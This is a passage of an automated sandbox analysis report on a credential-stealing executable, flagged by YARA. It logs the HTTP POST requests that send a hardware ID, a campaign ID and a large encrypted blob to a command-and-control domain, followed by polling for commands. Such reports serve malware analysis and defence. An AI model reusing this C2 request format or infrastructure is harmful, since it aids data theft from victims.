                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1316&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2188&delivery_rate=2212375&cwnd=231&unsent_bytes=0&cid=bc46450d69b7fe21&ts=1534&x=0"
                                                                                                          2024-10-27 12:03:09 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a
                                                                                                          Data Ascii: 11ok 173.254.250.90
                                                                                                          2024-10-27 12:03:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                          6 | 192.168.2.4 | 49736 | 172.67.170.64 | 443 | 7472 | C:\Users\user\Desktop\file.exe
                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                          2024-10-27 12:03:11 UTC | 283 | OUT | POST /api HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Content-Length: 568249
                                                                                                          Host: crisiwarny.store
                                                                                                          2024-10-27 12:03:11 UTC | 15331 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 45 46 31 34 43 32 30 46 42 42 34 37 35 34 41 42 35 35 37 39 37 30 35 33 45 45 35 46 36 36 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7EF14C20FBB4754AB55797053EE5F66C--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                                          2024-10-27 12:03:11 UTC | 15331 | OUT | Data Raw: 07 e8 ee 48 58 10 ed e7 2c 8c 62 7c 9d 7d 3c fe 34 fc 50 51 cf cb 2e df 5f 7d c5 ee 33 1d f1 15 18 90 62 4e 00 7c 1b 3c 8b 79 f8 8d 9d 47 f9 66 23 0e 7f 83 c5 19 97 ff cf 08 20 0f a9 c0 23 bf 0d c1 fd 20 ce 90 9a eb 07 98 b9 7c e0 34 1c 10 19 82 e3 1e 95 ad 75 f0 9b d9 8f d9 50 0c 59 29 e6 45 f9 d2 67 d7 52 7e e7 4d b5 8c 40 d0 5e be 3d 67 ad 0f b4 b6 5d f2 7e 1e e7 f5 bc 5a c4 d3 03 47 68 13 6f 8e d6 68 e0 72 dc 6b 92 d5 f2 2f ff c0 0f 84 49 a2 5b ef 53 98 8b ec 99 2f 7f 6d 6b c7 52 ca e3 14 cc f3 be e1 ce 68 a6 37 fa 28 83 ce 27 f4 c0 f7 ca b5 4a 22 61 6c 33 e7 dd a5 41 ab a6 9d fc 1e 34 e5 64 88 49 ca f2 d5 f6 c5 bf c5 70 44 82 ea 4d c4 c2 84 c4 6d cd e8 51 53 b9 ac fe 30 44 de e4 f2 75 b0 cd f9 6e 69 ff 55 be ba 8f 3f 07 24 2d 8d 30 27 4e 3b ef 7a 92
                                                                                                          Data Ascii: HX,b|}<4PQ._}3bN|<yGf# # |4uPY)EgR~M@^=g]~ZGhohrk/I[S/mkRh7('J"al3A4dIpDMmQS0DuniU?$-0'N;z
                                                                                                          2024-10-27 12:03:11 UTC | 15331 | OUT | Data Raw: dd dd b2 87 96 a5 94 dc ea ae aa 72 f7 e8 67 c5 e3 32 9a 2e 9b c6 1f b5 b1 81 97 0b bb 83 93 f0 c1 5e a2 e5 0e 5f e9 f5 5f fd af bf b5 a9 72 8f a8 a9 29 94 04 43 c5 21 a6 10 63 36 17 0f b6 ed f8 57 8b a5 d6 45 20 06 e9 bf 23 d7 e7 5f 82 a4 99 ff 0e b1 ce cd d6 f0 06 34 12 12 40 9c 22 ff 5f 83 a6 a5 fa fb 44 4d 20 02 0e 63 78 27 f7 ec ee 03 d2 fb 69 aa 08 1c 5f bf be 4f b6 51 26 19 aa 5e dd 59 d7 2f 57 29 05 16 1b 6f 40 be a2 cf d2 8f ab 89 b6 7f 44 5f c9 be cf db f3 17 50 04 e3 ea 09 3f 8f ff 69 2b 88 ac 43 0e b4 78 eb 0f 82 14 5c 66 8c 4f 8f 42 b4 70 74 00 7c 6c 41 a5 88 23 bf ae ab e1 89 bb 6a c0 24 ec 26 3c e0 04 11 c1 87 a9 88 d7 a4 02 2d 8f dc bd 0d 3a 5b f2 a7 48 c5 f3 b5 6b f8 52 93 f4 9e 54 c4 48 09 99 cb 84 95 80 bd 03 2c 62 e2 3e 92 37 a7 80 19
                                                                                                          Data Ascii: rg2.^__r)C!c6WE #_4@"_DM cx'i_OQ&^Y/W)o@D_P?i+Cx\fOBpt|lA#j$&<-:[HkRTH,b>7
                                                                                                          2024-10-27 12:03:11 UTC | 15331 | OUT | Data Raw: c1 44 ed e3 8e 7d f7 2d fa 25 9a 09 02 d1 bb ff f3 c1 7b 59 f6 e7 ca f6 8f 95 15 2f 6b 32 91 38 44 b8 85 be 7d 9c 7c 23 37 0d d0 d5 88 54 1a 9a cc 8f e2 55 02 1e 58 ec fa 31 0d 4b 15 bc 53 8e 09 16 3c 85 c2 11 07 b8 86 07 07 71 1e 25 2a 2f 66 d9 0f 4d 3e f2 c0 ce 93 6f df bc fe 43 d7 cd 72 7e 08 3d d2 79 71 0e 10 af 40 44 85 a1 7c 14 70 6d 2b 78 f2 04 2e 05 f5 fa ff 9d 5a 6b 73 c1 5a bd 7d bf de a0 6d 17 ae 5f 8f 45 de 99 ad f6 e5 35 2b 3e e5 56 ed 85 f1 e2 5d 91 5f 28 ce 12 f5 b3 f4 6a 08 48 c4 41 6e 93 7b d7 ad 78 02 e4 81 f3 f7 39 52 44 0d 6e 28 ae 14 b5 2b 6f 97 1e f6 bb 84 c0 6b 34 bd 53 80 ac cb 52 5f 11 b2 a8 25 a5 8a e2 44 c0 1b 51 75 4b 90 d9 10 e2 0a 08 43 05 73 c3 72 62 23 d5 5a cf 18 fa 42 ea ff 44 bc 38 44 6a 01 98 45 34 3b 4e 0f b5 13 1c 5c
                                                                                                          Data Ascii: D}-%{Y/k28D}|#7TUX1KS<q%*/fM>oCr~=yq@D|pm+x.ZksZ}m_E5+>V]_(jHAn{x9RDn(+ok4SR_%DQuKCsrb#ZBD8DjE4;N\
                                                                                                          2024-10-27 12:03:11 UTC | 15331 | OUT | Data Raw: 9d 7f f2 85 35 49 97 83 63 81 45 c0 9d 48 2f d1 d0 e4 26 65 26 23 a6 91 55 f2 c0 65 be fc d2 03 09 4e 21 a8 7f 04 13 f1 cd 23 42 28 e3 0a 0e e0 10 78 f6 4a 60 56 9f 5b 11 08 84 36 42 0b 19 fe 30 a8 1f 1a 19 19 08 87 f9 ad 6b f4 f2 33 2c 9a 1a 03 e9 e6 b4 df 27 c8 a6 47 8f 87 67 44 68 57 70 55 bc 11 0a ab 6f 95 ac c9 56 01 67 26 e5 21 a2 1b df f2 00 12 8f 08 94 be e5 6b e2 af 61 d8 16 a9 b9 56 e9 73 93 34 d1 7c 40 52 78 c2 c9 58 9f 3b 85 39 33 79 71 ff 7a ee 90 3a 66 38 f0 d1 e0 70 f0 b1 05 e5 ee 22 46 ab b6 98 9d b6 54 f3 42 30 e3 da 71 b2 d8 fa 6b 4d db 61 f9 d6 45 49 fb fa 30 0d d1 b6 72 4e 18 37 45 50 60 24 08 03 82 31 30 c6 36 e8 df 25 40 1f 59 30 12 03 b6 d1 b4 aa 73 c5 4e 31 98 70 44 ba 45 88 be 97 5d 33 f5 93 d0 b8 54 c1 eb 9c b7 f1 68 fb f3 02 cc
                                                                                                          Data Ascii: 5IcEH/&e&#UeN!#B(xJ`V[6B0k3,'GgDhWpUoVg&!kaVs4|@RxX;93yqz:f8p"FTB0qkMaEI0rN7EP`$106%@Y0sN1pDE]3Th
                                                                                                          2024-10-27 12:03:11 UTC | 15331 | OUT | Data Raw: fd b7 6d b1 2b a0 92 6b b3 1e f5 d2 22 50 72 2c ee 32 b8 3a 9a 88 6a 25 5d 3c 3d 99 a5 81 87 e6 62 c6 ad 73 eb 22 78 2e 61 29 6c ad 0b 74 73 08 09 cf 48 7e 7c 25 de 17 49 35 40 60 8d 54 fc ba 65 c8 fc ea b2 6e c1 18 52 02 11 aa fd 7c 02 c4 70 4f 17 64 92 ce c3 c8 e7 bb 70 b0 cb a3 7a c0 4c c5 47 96 b7 9b 1c 24 9d 03 ec f7 b3 c5 59 4b 20 b5 8d 52 b1 16 38 0b 4e 83 29 77 45 31 a0 79 c5 94 ba 03 36 06 b5 32 2b 07 1e 28 df dd 1c d0 c5 10 51 15 6a 32 ee 79 bd 08 93 4d 19 63 dd 2a 3b 0b e4 ff a0 80 39 69 d3 9a 36 52 d0 be eb 08 0f da 1c 94 50 09 d1 26 0c cd 71 c0 30 1e 6e 41 02 cb 47 70 97 28 d8 5d b6 2c 4c 6f 37 ee 15 07 65 9b b7 f7 06 a0 80 06 fb 89 26 a2 b2 50 ab 88 10 3d a7 53 92 01 f5 1d 1c 2f 56 05 a7 19 ee 1f 36 d6 0f 3b 0e 6e 34 7d 48 39 3c ce 7e 54 99
                                                                                                          Data Ascii: m+k"Pr,2:j%]<=bs"x.a)ltsH~|%I5@`TenR|pOdpzLG$YK R8N)wE1y62+(Qj2yMc*;9i6RP&q0nAGp(],Lo7e&P=S/V6;n4}H9<~T
                                                                                                          2024-10-27 12:03:11 UTC | 15331 | OUT | Data Raw: 9a 1f 71 c7 8f c9 16 1d 7a 2b 0d 7c d3 ab 2d 61 4b 52 eb 01 41 8e 17 a2 e0 e7 e2 68 39 a8 5a a3 b7 59 52 71 3b d3 9b 16 5b 64 e1 47 13 2e 30 a5 0d db 14 c1 1d 94 04 87 e6 1e 02 d2 cd a9 69 bb a7 6f 5d ae 3b ae 28 53 de a8 ab 01 ba 79 82 f0 3b 8f d1 d3 68 fa db 8d 51 cb dc fe de 31 fe ef b6 d0 17 75 c2 75 ce 10 99 91 15 c0 7f cf dc b0 1f 49 5a e4 e7 fb 08 d3 e7 ad c3 f7 14 0c 71 ff c2 f1 8e eb 02 76 8c 32 e2 27 c4 a7 7a 05 d9 b6 80 fd 5d 96 08 34 3a 72 f7 90 f8 19 87 b9 d2 ac 2e 35 54 0d a5 05 ea 93 07 87 3e e2 92 0e 7a 19 6a f7 28 f6 39 96 ed 08 3d 23 4b ea 9b c0 a5 d7 e9 76 7e e5 0c 95 1f 8c 44 5a 8e 61 aa 1e 90 9e b3 7e 5a 5d 69 20 4d e3 f2 b7 6b 0c 8f 20 99 24 0a 2b dc 03 a1 dd 44 85 50 44 14 38 31 28 76 eb ae c5 f8 51 91 43 e2 47 57 9f cd 37 84 2a 90
                                                                                                          Data Ascii: qz+|-aKRAh9ZYRq;[dG.0io];(Sy;hQ1uuIZqv2'z]4:r.5T>zj(9=#Kv~DZa~Z]i Mk $+DPD81(vQCGW7*
                                                                                                          2024-10-27 12:03:11 UTC | 15331 | OUT | Data Raw: a2 67 18 cc a4 cf d4 41 29 48 65 86 b9 e2 52 fb 05 3d 7d 15 45 95 fb ca cf 90 36 c8 3e 83 e1 18 19 dd fe 13 61 f4 5a d7 47 66 3b 19 44 01 50 5e 3a 5e 5e 6e e0 15 07 f0 c1 0b da f5 e1 d2 8e 7e 9c a9 8c cb 80 d0 ef 17 9c ee 66 fc 59 b7 bd ae dd a8 78 3d 43 85 2b 73 8e a4 bf 65 6f b9 a8 75 95 c6 0d fe 10 2c ba d5 ca e5 3b c7 d6 8e 99 43 52 32 2b 55 36 ed d9 e9 93 b6 de 57 81 3e 2d fd 68 46 6b 68 3e 4d 9d 9b 10 bc 2b 7d ca 06 8e 83 ff a6 f4 7f eb 19 bc 69 08 08 05 50 0f 5e d2 d8 86 23 1c ec fc 6d 6d fc 03 3d 3b 68 e3 75 41 d0 d6 d8 49 4e 15 f3 e0 0e f2 b1 fc 2e 36 a7 d7 58 20 46 29 73 f0 bd 1c d0 3a 42 bb fe 39 2d 57 b1 e5 76 80 f6 e3 f0 cf 77 8c 6f 69 81 e9 92 a8 06 44 a5 f7 89 23 41 98 28 6b 01 70 0b 85 e6 5d 3a e5 4c 98 14 1d 76 95 92 d9 55 97 ef d5 2d f5
                                                                                                          Data Ascii: gA)HeR=}E6>aZGf;DP^:^^n~fYx=C+seou,;CR2+U6W>-hFkh>M+}iP^#mm=;huAIN.6X F)s:B9-WvwoiD#A(kp]:LvU-
                                                                                                          2024-10-27 12:03:11 UTC | 15331 | OUT | Data Raw: 6b aa d0 71 28 19 d6 b9 b5 64 04 7c 61 35 0b e0 e7 2d 15 68 aa ba 08 88 7d d6 17 f0 54 44 a9 4b 05 42 63 cf 3b 56 bd 2c ee b0 21 5c df 42 dc 73 90 3b e6 0b ea d5 19 7d 0b 31 eb 61 30 0d 0e bd b0 18 ae d2 07 1f 96 6d 99 a0 52 b1 b3 fe 34 54 18 0e 92 44 9d 5f ad d4 39 12 26 b3 35 1a 58 36 c0 ad d1 1d 49 24 74 b4 21 2e f5 16 fa f1 5d 14 02 49 6d 26 8d b7 d7 8d 9d 9a 02 53 65 f6 14 a3 cc ee 59 08 6f 48 ac ee 95 7e 57 40 f4 12 15 d6 b2 ea 0b 8b 0a 9b c4 bd 33 6f c3 1c 71 d3 ba 82 39 0f c5 2e 5e 71 89 30 e6 55 e9 77 b3 f4 32 1d cd 25 f8 73 fb 61 84 c7 74 72 3c a3 bb 7e b3 76 ef 04 cf b1 2b a6 c2 a8 50 ea fa cc 10 7d 37 ac 34 cb ab 53 8a 2d 4b 9f 76 d3 ce 00 38 2a cc 6c cd 1b be ae 37 91 1d 10 bf 69 a5 db 9e cd 90 e2 5c 35 a0 5e 6b 23 74 f5 b0 3d 8e 62 75 15 2e
                                                                                                          Data Ascii: kq(d|a5-h}TDKBc;V,!\Bs;}1a0mR4TD_9&5X6I$t!.]Im&SeYoH~W@3oq9.^q0Uw2%satr<~v+P}74S-Kv8*l7i\5^k#t=bu.
                                                                                                          2024-10-27 12:03:11 UTC | 15331 | OUT | Data Raw: 6c e5 ff 5d e8 78 bd eb 1b 89 5a 7f 35 b7 de 9e 0f e8 88 16 7c 63 bc 3c 38 22 07 de c9 e8 21 c1 d3 3e d1 74 f3 90 1f db 2d fb 93 4d ae 6e fd 78 26 ac 01 4e ae db a9 f3 7f 06 38 ae 56 c2 12 71 85 bc 40 67 ed b6 d7 ad bb ce 47 a9 3f 90 68 bf da 5b ef 92 e4 c0 6f b9 53 ba b8 e7 75 e2 10 8e ab 12 50 25 7d f3 a3 4a c2 5b 0c d1 b6 06 85 1d 54 de 8d 3e b6 d7 08 76 84 64 ab c0 e1 fa eb 69 61 6e 2a 8d bb 4d 78 4f 8f be eb c4 e7 45 0d c5 cc 5f 35 4b eb 10 bf 45 14 fa ec 40 ed 4a 0e 1d b8 23 b7 61 7f 6d ed a3 08 9e fb 82 2e 4a c3 18 1e 12 54 52 4c b0 cc 16 7c 7d 54 eb 53 f4 9b 4d f6 91 62 0f 28 db c9 4b 5d da 8b 4a 71 c1 ce 8d 17 0b df 75 6e 8e e4 65 61 38 6e 66 d2 d3 18 08 37 e7 da 8c 1d 5f 7b 5b 13 7d 04 ab df ca ed 74 32 50 5c ab 8d 23 55 f1 e1 13 83 35 f4 da c4
                                                                                                          Data Ascii: l]xZ5|c<8"!>t-Mnx&N8Vq@gG?h[oSuP%}J[T>vdian*MxOE_5KE@J#am.JTRL|}TSMb(K]Jqunea8nf7_{[}t2P\#U5
                                                                                                          2024-10-27 12:03:38 UTC | 1018 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Sun, 27 Oct 2024 12:03:38 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Set-Cookie: PHPSESSID=sk3es93aolfv2slc7jfv08i115; expires=Thu, 20 Feb 2025 05:49:53 GMT; Max-Age=9999999; path=/
                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          vary: accept-encoding
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S76OiR0Bx47UqKCXwGyNcPua3gWJbGdGI%2Bl3S22%2FAqX4T%2BOTNJQFXFDmLUI9DddTqohat6WXLoCtp1jgJ56RgDVCKzkqYCezdZHe4ItX0VlXutRt5O0JRuM%2FHCixsAGSCwrM"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8d928a9afd194683-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1146&sent=220&recv=613&lost=0&retrans=0&sent_bytes=2837&recv_bytes=570796&delivery_rate=2496551&cwnd=251&unsent_bytes=0&cid=a24563946e4833b8&ts=27156&x=0"


                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                          7 | 192.168.2.4 | 49701 | 172.67.170.64 | 443 | 7472 | C:\Users\user\Desktop\file.exe
                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                          2024-10-27 12:03:38 UTC | 264 | OUT | POST /api HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Content-Length: 87
                                                                                                          Host: crisiwarny.store
                                                                                                          2024-10-27 12:03:38 UTC | 87 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d 26 68 77 69 64 3d 37 45 46 31 34 43 32 30 46 42 42 34 37 35 34 41 42 35 35 37 39 37 30 35 33 45 45 35 46 36 36 43
                                                                                                          Data Ascii: act=get_message&ver=4.0&lid=4SD0y4--legendaryy&j=&hwid=7EF14C20FBB4754AB55797053EE5F66C
                                                                                                          2024-10-27 12:03:39 UTC | 1003 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Sun, 27 Oct 2024 12:03:39 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Set-Cookie: PHPSESSID=7tc8pkcie1tt7r8mb1h32h2i41; expires=Thu, 20 Feb 2025 05:50:18 GMT; Max-Age=9999999; path=/
                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          vary: accept-encoding
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lnWCpbV70MJzvzAFfNcoI3Bx7j4Jbm1RRvtCLsLASPbzlan8LXVGdaqFjg2htEmQT6CpdfhAwjRU4RQOKs83WHTpDZcq0DeDE%2BDbsLYm8dwhVOhEIOSn89Cjl79tX4Alyp1g"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8d928b48eab30b82-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1578&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=987&delivery_rate=1819095&cwnd=251&unsent_bytes=0&cid=a10b6eda5abf6bf4&ts=525&x=0"
                                                                                                          2024-10-27 12:03:39 UTC | 130 | IN | Data Raw: 37 63 0d 0a 49 6a 66 4b 2f 77 2f 6d 32 44 4a 79 71 31 30 38 78 59 78 56 6d 61 4a 6c 4a 6c 6e 45 54 39 57 56 33 4e 30 75 32 45 34 63 4c 62 4a 35 54 4f 69 4b 4c 64 7a 36 57 67 62 66 4c 51 61 5a 6f 77 6d 32 6b 31 30 54 64 2f 5a 2b 34 4c 76 74 37 42 33 32 66 79 70 78 6e 55 31 52 72 4b 4d 67 67 72 31 55 58 4d 34 6c 57 65 65 67 64 2f 2f 57 52 78 78 70 36 47 32 77 74 2b 62 74 55 34 55 3d 0d 0a
                                                                                                          Data Ascii: 7cIjfK/w/m2DJyq108xYxVmaJlJlnET9WV3N0u2E4cLbJ5TOiKLdz6WgbfLQaZowm2k10Td/Z+4Lvt7B32fypxnU1RrKMggr1UXM4lWeegd//WRxxp6G2wt+btU4U=
                                                                                                          2024-10-27 12:03:39 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Target ID: 0
                                                                                                          Start time: 08:02:58
                                                                                                          Start date: 27/10/2024
                                                                                                          Path: C:\Users\user\Desktop\file.exe
                                                                                                          Wow64 process (32bit): true
                                                                                                          Commandline: "C:\Users\user\Desktop\file.exe"
                                                                                                          Imagebase: 0x840000
                                                                                                          File size: 2'921'984 bytes
                                                                                                          MD5 hash: 5C0022DD6F83870F6A81FAF362383AE3
                                                                                                          Has elevated privileges: true
                                                                                                          Has administrator privileges: true
                                                                                                          Programmed in: C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1711943208.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation: low
                                                                                                          Has exited: true

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000003.2085694944.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, Offset: 006F4000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_3_6f2000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ac487c774bc5449ac42e4d8143fd7521ea923bb81e0e38de28b5b1a7358d4b45
                                                                                                            • Instruction ID: 6a8940c5955fe289d9caa18d3b1f4bb57af20e7ef437cf8330d7aaf34ee41558
                                                                                                            • Opcode Fuzzy Hash: ac487c774bc5449ac42e4d8143fd7521ea923bb81e0e38de28b5b1a7358d4b45
                                                                                                            • Instruction Fuzzy Hash: 4721FF7205A3C1AFCB52DF38C9D1A833F61AF4732474A82D8E4805E047D328A623CB92